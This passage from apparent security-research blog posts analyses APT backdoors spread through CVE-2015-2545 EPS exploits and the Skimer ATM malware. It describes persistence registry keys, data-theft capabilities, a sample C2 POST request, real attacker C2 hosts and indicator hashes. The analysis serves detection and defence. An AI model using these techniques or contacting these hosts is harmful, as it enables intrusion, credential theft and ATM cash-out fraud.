• Passes execution to the new buffer
• Enumerates drives and their type
• Enumerates given registry key and value
• Enumerates processes
• Deletes given file
• Creates given process
• Writes to file and launches it
• Enumerates services
• Terminates given process
• Provides shell via cmd.exe

The malware connects to the following C2s:

• newsupdate.dynssl.com (103.61.136.120)
• dnsnews.dns05.com (118.193.12.252)

The connection:

The two hosts are dynamic DNS subdomains, using the provider CHANGEIP DNS.

SVCMONDR: the Taiwan case

In December 2015, we uncovered another example of the type of shellcode found in the exploit for CVE-2015-2545. On 11 December, a spear-phishing email was sent by attackers to an employee of a Taiwanese security software reseller.

Spear-phishing email

The attachment contained a Web Archive File with “1-3說明檔.doc” and a malicious EPS file inside.

“1-3說明檔.doc”

This EPS (98c57aa9c7e3f90c4eb4afeba8128484) is exploit CVE-2015-2545 and contains an encrypted binary starting with “PdPD” (50 64 50 44), the same as seen in the Danti attacks.

The structure of the Web Archive also carries references to the same files as the Danti group (with image002.gif and “image002.eps”.) However, the files themselves are absent from the archive.

Part of the Web Archive

This resemblance could mean that we can attribute this case to the Danti group. However, it could also be a coincidence or yet another case of different groups using the same malicious code. That’s why we are noting this incident separately from the Danti group’s activity.

Interestingly, in the first few days of December, another group – APT16 (FireEye’s classification) also targeted Taiwan-based organizations with a CVE-2015-2545 EPS exploit, and its emails originated from the same domain as the one sent by the SVCMONDR attackers. However, it used another type of shellcode and a different backdoor – ELMER.

After opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program “svcmondr.exe” (8052234dcd41a7d619acb0ec9636be0b).

This queries the registry:

“HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings” and “HKCU\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Connections\DefaultConnectionSettings” and compares the values. If they don’t coincide, it sets the “DefaultConnectionSettings” value from the HKEY_USERS to HKCU key.

It sets values taken from:

1. HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ {A8A88C49-5EB2-4990-A1A2-0876022C854F}
2. HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ {AEBA21FA-782A-4A90-978D-B72164C80120}
3. HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10

To the appropriate HKCU key (for example: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ {A8A88C49-5EB2-4990-A1A2-0876022C854F}, etc.).

Then forms the structure in order to send it to the CnC in a POST-request with the following fields:

• 0x8888 constant
• 0x8000 constant
• 18-bytes hex string based on CoCreateGuid function
• Local IP

Example of POST request

It encodes the resulting structure with base64. Example of a POST request:

POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 59.188.13.204:9080
Content-Length: 112
Connection: Keep-Alive
Cache-Control: no-cache

Based on the CnC response, the sample:

• Checks the password in the CnC response and compares it with the hardcoded password “1010” in its configuration structure. If the password is valid, it sets a “certified” flag and can further process the following commands.
• Launches given command line with ShellExecute, writes output results to %tmp% file, sends results to CnC and deletes the file.
• Uploads given file to CnC.
• Sets sleep interval.

All results sent to the CnC after processing commands are encrypted with RC4 with a MAC-address as a key.

The CnC points to an IP address in Hong Kong. This IP address belongs to a local private company, but falls within a range of IP addresses that belong to another enterprise that has already been identified as a host location for command and control servers that communicate with malware.

The CnC has been used in other APT incidents, attributed by FireEye to the group “admin@338” aka “Temper Panda” (59.188.0.197, accounts.serveftp.com).

In general, this IP address space from “New World Telecom HK” is one of the favorite places used by different Chinese-origin APT groups to host command & control servers/proxies.

Another detail suggesting a possible relationship between SVCMONDR and Temper Panda is the use of the “PdPD” (50 64 50 44) marker for encrypted binaries. According to Crowdstrike, the same marker has been used previously by a number of APT groups (Anchor Panda, Samurai Panda and Temper Panda).

The latest known activity of “admin@338” was in August 2015, when it was used to target Hong Kong-based media using its own tools, LOWBALL and BUBBLEWRAP.

However, we are unable to draw any conclusion regarding the relationship between the SVCMONDR group and Temper Panda.

According to KSN data, in addition to Taiwan, there are some SVCMONDR victims in Thailand.

Conclusions

We are currently aware of at least four different APT actors actively using exploits of the CVE-2015-2545 vulnerability: TwoForOne (also known as Platinum), EvilPost, APT16 and Danti.

These groups have their own toolsets of malicious program. Danti’s arsenal is more extensive than those of EvilPost and APT16, and in terms of functionality can be compared with Platinum. All groups are focused on targets in the Asian region and have never been seen in incidents in Western Europe or the USA.

The TwoForOne (Platinum) group is described in Microsoft research, APT16 in FireEye reports, and EvilPost and Danti in Kaspersky Lab private reports.

Danti is highly focused on diplomatic entities. It may already have full access to internal networks in Indian government structures. According to Kaspersky Security Network, some Danti Trojans have also been detected in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines.

Despite the fact that Danti uses a 1-day exploit, the group is able to make its own modifications to bypass current antivirus detections. A number of the modules used by Danti have the same functionality as previously known and used malicious programs like NetTraveller and DragonOK.

The use of CVE-2015-2545 exploits is on the rise. In addition to the groups mentioned above, we have seen numerous examples of these exploits being used by traditional cybercriminals in mass mailings in February-April 2016. Such attacks mostly target financial institutions in Asia. Specifically, attacks have been recorded in Vietnam, the Philippines and Malaysia. There are reasons to believe that Nigerian cybercriminals are behind these attacks. In some cases, the infrastructure used is the same as the one we saw when analyzing the Adwind Trojan.

We expect to see more incidents with this exploit and we continue to monitor new waves of attacks and the potential relationship with other attacks in the region.

The EPS Awakens
Part 1
Part 2

Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets

New Poison Ivy Rat Variant targets Hong-Kong-Pro-Democracy Activists

Microsoft research “Platinum”

EvilPost attacks (Kaspersky Lab Private Report, March 2016)

Appendix A: EPS Objects their payload and http.exe trojan analysis EPS Objects

File MD5: a90a329335fa0af64d8394b28e0f86c1
File type: Encapsulated Postscript File
Size: 189’238 bytes
File Name: image001.eps (from HQ list)

This EPS file contains a shellcode that decrypts and saves file “lsass.exe” and decoy document to disk.

The dropped malicious files are described below.

File MD5: 07f4b663cc3bcb5899edba9eaf9cf4b5
File type: Encapsulated Postscript File
Size: 211’766 bytes
File Name: image001.eps (from Mission list)

This EPS file contains a shellcode that decrypts and saves file “lsass.exe” and decoy document to disk.

The dropped malicious files are described below.

File MD5: b751323586c5e36d1d644ab42888a100
File type: Encapsulated Postscript File
Size: 398’648 bytes
File Name: image001.eps (from India’s 10 Top Luxury Hotels)

This EPS file contains a shellcode that decrypts and saves the dropper file (Windows CAB) and decoy document to disk.

The dropper and dropped malicious file “http.exe” are described below.

Payload analysis Backdoor File Name lsass.exe MD5 8ad9cb6b948bcf7f9211887e0cf6f02a File type PE32 executable for MS Windows (GUI) Intel 80386 32-bit Compilation timestamp 2015-12-28 07:47:54 PE Resources BIN (CHINESE SIMPLIFIED) Size 138’240 bytes

URL: http://goback.strangled[.]net:443/ [random string]
TYPE: POST
USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Real IP: 180.150.227.135:443

Drops file from its resource section to %ALLUSERSPROFILE%\ IEHelper\mshtml.dll. The backdoor then writes a string to a given offset with the value dependent on the %ALLUSERSPROFILE% environment variable.

Thus, the md5 of dropped files can vary. Examples of md5 with standard variables:

be0cc8411c066eac246097045b73c282
bae673964e9bc2a45ebcc667895104ef

Sets registry:

“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersio\Run” value {53372C34-A872-FACF-70A7-A23C81C766C4} = “C:\Windows\System32\rundll32.exe %ALLUSERSPROFILE%\ \IEHelper\mshtml.dll, IEHelper”

In any case:

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{53372C34-A872-FACF-70A7-A23C81C766C4}” value “StubPath” = “C:\Windows\System32\rundll32.exe %ALLUSERSPROFILE%\ \IEHelper\mshtml.dll, IEHelper”

Sets the following values before creating the instance of IE for communicating with the CnC:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ DisableFirstRunCustomize=1
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ Check_Associations=”no”
HKEY_CURRENT_USER\Software\Microsoft\Internet Connection Wizard\ Completed=1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ IEHarden=0

Collects the following info, encodes with base64 and sends to the CnC:

• Memory status
• OS version
• User name
• OEM code page identifier
• Local IP
• CPU speed

Forms the following body in POST request to the CnC:

—-=_Part_%x
Content-Disposition: form-data; name=”m1.jpg”
Content-Type: application/octet-steam
%base64%
—-=_Part_%x

The URL path in the POST request is generated randomly with uppercase letters.

Example of CnC communication:

Based on the CnC response, the sample:

• Provides shell via cmd.exe
• Creates directory
• Lists files in directory
• Deletes file
• Uploads given file to CnC
• Enumerates drives, gets their type and available space
• Launches given file
• Moves file
• Writes and appends to given file
• Uninstalls itself
File Name mshtml.dll MD5 be0cc8411c066eac246097045b73c282
or bae673964e9bc2a45ebcc667895104ef
or different File type PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit Compilation timestamp 2015-12-28 07:45:20 Size 72’192 bytes

mshtml.dll repeats entirely the functionality of its dropper (CnC communication and commands processing) in its “IEhelper” export and is built on the same source code.

http.exe trojan MD5 6bbdbf6d3b24b8bfa296b9c76b95bb2f | Sun, 13 Apr 2008 18:32:45 GMT

Drops file to %Temp%\IXP000.TMP\http.exe and launches it.

Filename http.exe MD5 3fbe576d33595734a92a665e72e5a04f | Wed, 13 Jan 2016 10:25:10 GM CnC carwiseplot.no-ip.org/news/news.asp

Sets registry:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run

Copies itself to %ALLUSERPROFILE%\Accessories\wordpade.exe, launches it and exits self-process.

Creates mutex “Global\wordIE”. Stores keystrokes and windows titles to %Temp%\dumps.dat and xors it with 0x99.

Knocks to CnC via IE instance: carwiseplot.no-ip.org/news/news.asp

Includes the following field in HTTP-header:

Cookie: ID=1%x, where %x – Volume Serial number of disk C

Based on the CnC response, the sample:

• Provides shell via cmd.exe
• Lists files in all drives and writes to given file
• Retrieves OS version, Local IP, installed browser, Computer name, User name and writes to given file
• Writes to given file
• Deletes given file
• Uploads given file to CnC
• Makes screenshots and writes to file %Temp%\makescr.dat
• Retrieves proxy settings and proxy authentication credentials from Mozilla (signons.sqlite, logins.json) and Chrome files (%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data), Microsoft WinInet storage, Microsoft Outlook
Appendix B: Danti sample hashes

Emails:
aae962611da956a26a76d185455f1d44 (chancery@indianembassy.hu)
3ed40dec891fd48c7ec6fa49b1058d24 (amb.bogota@mea.gov.in)
1aefd1c30d1710f901c70be7f1366cae (amb.copenhagen@mea.gov.in)
f4c1e96717c82b14ca76384cb005fbe5 (India, dsfsi@nic.in)
1ba92c6d35b7a31046e013d35fa48775 (India, chumarpost@gmail.com)
6d55eb3ced35c7479f67167d84bf15f0 (India, Cabinet Secretary)

Doc (Web Archive File):
Aebf03ceaef042a833ee5459016f5bde (Mission List)
Fd6636af7d2358c40fe6923b23a690e8 (India’s 10 Top Luxury Hotels)

Docx:
D91f101427a39d9f40c41aa041197a9c (Holidays in India in 2016)

EPS:
07f4b663cc3bcb5899edba9eaf9cf4b5 (India, from Mission list)
a90a329335fa0af64d8394b28e0f86c1 (India, HQ List)
B751323586c5e36d1d644ab42888a100 (India, Hotels)
8cd2eb90fabd03ac97279d398b09a5e9 (Holidays in India in 2016)

CAB dropper:
6bbdbf6d3b24b8bfa296b9c76b95bb2f

RarSFX:
d0407e1a66ee2082a0d170814bd4ab02
4902abe46039d36b45ac8a39c745445a

Potplayer:
f16903b2ff82689404f7d0820f461e5d (clean tool)

Trojans:
6bbdbf6d3b24b8bfa296b9c76b95bb2f (dropper, from cab-archive)
3fbe576d33595734a92a665e72e5a04f (http.exe)
9469dd12136b6514d82c3b01d6082f59
be0cc8411c066eac246097045b73c282 (mshtml.dll)
bae673964e9bc2a45ebcc667895104ef
d44e971b202d573f8c797845c90e4658 (update.dat)
332397ec261393aaa58522c4357c3e48 (potplayer.dll)
2460871a040628c379e04f79af37060d (appinfo.dat)

C2
74.208.4.200
74.208.4.201
180.150.227.135
Goback.strangled[.]net:443
carwiseplot.no-ip[.]org (115.144.69.54, 115.144.107.9)
newsupdate.dynssl[.]com (103.61.136.120)
dnsnews.dns05[.]com (118.193.12.252)

Appendix C: sample hashes of SVCMONDR attacks

Emails:
7a60da8198c4066cc52d79eecffcb327 (Taiwan, janet@eranger.com.tw)

Doc (Web Archive File):
d0533874d7255b881187e842e747c268 (Taiwan, 1-3說明檔.doc)

EPS:
98c57aa9c7e3f90c4eb4afeba8128484 (Taiwan)

Trojans:
8052234dcd41a7d619acb0ec9636be0b (svcmondr.ex, Taiwan)
046b98a742cecc11fb18d9554483be2d (svcmondr.ex,Thailand)

C2:
59.188.13.204
180.128.10.28
www.ocaler.mooo[.]com
www.onmypc.serverpit[.]com

### ATM infector

Tue, 05/17/2016 - 06:57

Seven years ago, in 2009, we saw a completely new type of attack on banks. Instead of infecting the computers of thousands of users worldwide, criminals went directly after the ATM itself – infecting it with malware called Skimer. Seven years later, our Global Research and Analysis Team together with Penetration Testing Team have been called on for an incident response. They discovered a new, improved, version of Skimer.

Virus style infections

Criminals often obscured their malware with packers to make analysis more difficult for researchers. The criminals behind Skimer also did this, using the commercially available packer Themida, which packs both the infector and the dropper.

Once the malware is executed it checks if the file system is FAT32. If it is, it drops the file netmgr.dll in the folder C:\Windows\System32. If it is an NTFS file system, the same file will be placed in the NTFS data stream corresponding to the XFS service´s executable file. Placing the file in an NTFS data stream is most likely done to make forensic analysis more difficult.

After successful installation, the sample patches the XFS executable (SpiService.exe) entry point, in order to add a LoadLibrary call to the dropped netmgr.dll file. This file is also protected by Themida.

Entry point in SpiService.exe before infection

Entry point in SpiService.exe after infection

After a successful installation the ATM is rebooted. The malicious library will be loaded into the SpiService.exe thanks to the new LoadLibrary call, providing it with full access to XFS.

Functionality

Unlike Tyupkin, where there was a magic code and a specific time frame where the malware was active, Skimer only wakes up when a magic card (specific Track 2 data, see IOCs at the bottom of this blogpost) is inserted. It is a smart way to implement access control to the malware’s functionality.

Once the magic card is inserted, the malware is ready to interact with two different types of cards, each with different functions:

1. Card type 1 – request commands through the interface
2. Card type 2 – execute the command hardcoded in the Track2

After the card is ejected, the user will be presented with a form, asking them to insert the session key in less than 60 seconds. Now the user is authenticated, and the malware will accept 21 different codes for setting its activity. These codes should be entered from the pin pad.

Below is a list of the most important features:

1. Show installation details;
2. Dispense money – 40 notes from the specified cassette;
3. Start collecting the details of inserted cards;
4. Print collected card details;
5. Self delete;
6. Debug mode;
7. Update (the updated malware code is embedded on the card).

During its activity, the malware also creates the following files or NTFS streams (depending on the file system type). These files are used by the malware at different stages of its activity, such as storing the configuration, storing skimmed card data and logging its activity:

C:\Windows\Temp\attrib1 card data collected from network traffic or from the card reader; C:\Windows\Temp\attrib4 logs data from different APIs responsible for the communication with the keyboard (effectively logging data such as the pin); C:\Windows\Temp\mk32 same as attrib4; C:\Windows\Temp:attrib1 same as the homologue file; C:\Windows\Temp:attrib4 same as the homologue file; C:\Windows\Temp:mk32 same as the homologue file; C:\Windows\Temp:opt logs mule´s activity.

Main window

The following video details the scenario on how money mules interact with an infected ATM as described above.

Conclusions

During our recent Incident Response cases related to the abuse of ATMs, we have identified Tyupkin, Carbanak and black box attacks. The evolution of Backdoor.Win32.Skimer demonstrates the attacker interest in these malware families as ATMs are a very convenient cash-out mechanism for criminals.

One important detail to note about this case is the hardcoded information in the Track2 – the malware waits for this to be inserted into the ATM in order to activate. Banks may be able to proactively look for these card numbers inside their processing systems, and detect potentially infected ATMs, money mules, or block attempts to activate the malware.

We also recommend regular AV scans, the use of whitelisting technologies, a good device management policy, full disk encryption, the protection of ATM BIOS with a password, only allowing HDD booting, and isolating the ATM network from any other internal bank networks.

Kaspersky Lab has now identified 49 modifications of this malware, with 37 of these modifications targeting ATMs made by just one manufacturer. The most recent version was discovered at the beginning of May 2016.

All samples described are detected by Kaspersky Lab as Backdoor.Win32.Skimer. Patched SpiService.exe files are detected as Trojan.Win32.Patched.rb

Appendix I. Indicators of Compromise Hashes

F19B2E94DDFCC7BCEE9C2065EBEAA66C
3c434d7b73be228dfa4fb3f9367910d3
a67d3a0974f0941f1860cb81ebc4c37c
D0431E71EBE8A09F02BB858A0B9B80380
35484d750f13e763eae758a5f243133
e563e3113918a59745e98e2a425b4e81
a7441033925c390ddfc360b545750ff4

Filenames

C:\Windows\Temp\attrib1
C:\Windows\Temp\attrib4
C:\Windows\Temp\mk32
C:\Windows\Temp:attrib1
C:\Windows\Temp:attrib4
C:\Windows\Temp:mk32
C:\Windows\Temp:opt
C:\Windows\System32\netmgr.dll

Track 2 data

******446987512*=********************
******548965875*=********************
******487470138*=********************
******487470139*=********************
******000000000*=********************
******602207482*=********************
******518134828*=********************
******650680551*=********************
******466513969*=********************